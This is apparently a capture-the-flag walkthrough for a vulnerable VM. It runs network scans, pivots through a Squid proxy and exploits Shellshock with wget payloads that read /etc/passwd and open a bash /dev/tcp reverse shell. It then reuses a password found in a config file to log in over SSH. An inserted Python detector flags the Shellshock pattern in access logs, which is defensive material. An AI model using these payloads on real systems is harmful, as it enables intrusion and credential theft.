  • netdiscover
  • Nmap
  • Metasploit
  • FoxyProxy

Use netdiscover to detect the target IP address:

netdiscover -i eth0 -r is the target.

Then run nmap to detect open ports and the services running on the target machine:

nmap -sV -v -O -A -T5 -p-

Looks like port 22 and port 3128 are open, and port 3128 is running Squid. Open msfconsole and search for squid. I found this:

Then use this module to scan the squid service:

Looks like port 80 is open behind the proxy:

Use the FoxyProxy add-on to configure the browser to use the Squid proxy:

Now visit

Now let's use nikto to scan the server through the proxy:

nikto -h localhost -useproxy

Looks like there is a Shellshock vulnerability in a CGI script.

Let’s test it:

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy= ""

It works, and it looks like there is an account named sickos.

Now let's set up a reverse shell.

Netcat-style shell access without netcat, using bash's /dev/tcp:

/bin/bash -i > /dev/tcp/[yourip]/[port] 0<&1

In one terminal, start the listener:

nc -nlvp 4444

In another terminal, send the payload through the proxy:

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/ 0<&1" -e use_proxy=on -e http_proxy= ""

Get the shell:
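Both payloads above (the /etc/passwd read and the reverse shell) carry the same Shellshock (CVE-2014-6271) signature in the User-Agent header, which is what a defender can hunt for in the web server or proxy access log. The detector below is an added example and not part of the original writeup; it parses constructed Apache combined-format log lines (TEST-NET addresses, hypothetical paths) and flags the `() { ... };` pattern in the Referer and User-Agent fields.

```python
import re

# Shellshock (CVE-2014-6271) probe signature: a bash function definition "() {"
# whose closing "};" is followed by extra commands. A header such as User-Agent
# reaches a CGI script as an environment variable, so a vulnerable bash runs
# whatever trails the function body.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')

# Apache-style "combined" access log line. Quotes inside header values are
# logged escaped as \" so the quoted-field pattern must allow backslash escapes.
_QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + _QUOTED + r' (\d{3}) (\S+) ' + _QUOTED + ' ' + _QUOTED + '$'
)

def is_shellshock_probe(value: str) -> bool:
    """True if a header value carries the '() { ... };' injection pattern."""
    return SHELLSHOCK_RE.search(value) is not None

def extract_command(value: str) -> str:
    """Return the command string smuggled after the function body, for triage."""
    m = SHELLSHOCK_RE.search(value)
    return value[m.end():].strip() if m else ""

def scan_log(lines):
    """Return one hit per log line whose Referer or User-Agent looks like Shellshock."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not a combined-format line; skip rather than guess
        client, when, request, _status, _size, referer, ua = m.groups()
        for field, value in (("referer", referer), ("user_agent", ua)):
            if is_shellshock_probe(value):
                hits.append({"client": client, "time": when, "request": request,
                             "field": field, "command": extract_command(value)})
    return hits

# Constructed sample log (TEST-NET addresses, hypothetical CGI path). The first
# two lines mirror the payload shape used in the writeup; the rest is normal traffic.
SAMPLE_LOG = [
    r'192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd"',
    r'192.0.2.10 - - [10/Oct/2023:13:55:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { test;};echo; /bin/bash -i > /dev/tcp/192.0.2.5/4444 0<&1"',
    r'192.0.2.20 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/90.0"',
    r'192.0.2.21 - - [10/Oct/2023:13:56:05 +0000] "GET /robots.txt HTTP/1.1" 404 200 "http://example.test/" "Wget/1.21"',
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["time"]} {h["client"]} {h["field"]}: {h["command"]}')
```

Because Squid sits in front of the web server here, the same check belongs on the proxy's access log (with User-Agent logging enabled) as well as on Apache's, and a hit is a trigger to patch bash rather than to block one source address.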

After enumeration, I found an interesting file: /var/www/wolfcms/config.php

Looks like the password is john@123.

SSH to the target server as sickos using this password:

Check sickos's sudo privileges:

sudo -l

Looks like this account can run commands as root.